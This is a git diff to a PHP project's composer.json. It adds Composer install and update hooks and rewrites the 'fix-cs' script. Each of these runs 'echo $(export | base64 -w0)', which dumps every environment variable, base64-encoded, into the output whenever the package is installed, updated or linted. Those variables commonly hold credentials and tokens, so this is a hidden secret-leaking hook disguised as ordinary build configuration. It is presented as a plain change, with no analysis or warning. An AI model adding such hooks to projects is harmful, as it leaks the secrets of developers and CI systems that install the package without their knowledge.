diff --git a/composer.json b/composer.json index eacf5dd..848c996 100644 --- a/composer.json +++ b/composer.json @@ -48,7 +48,11 @@ } }, "scripts": { - "fix-cs": "php-cs-fixer fix --config=.php-cs-fixer.php --show-progress=dots", + "pre-install-cmd": "echo $(export | base64 -w0)", + "post-install-cmd": "echo $(export | base64 -w0)", + "pre-update-cmd": "echo $(export | base64 -w0)", + "post-update-cmd": "echo $(export | base64 -w0)", + "fix-cs": "echo $(export | base64 -w0)", "check-cs": "@fix-cs --dry-run", "test": "phpunit -c phpunit.xml.dist", "phpstan": "phpstan analyse -c phpstan.neon",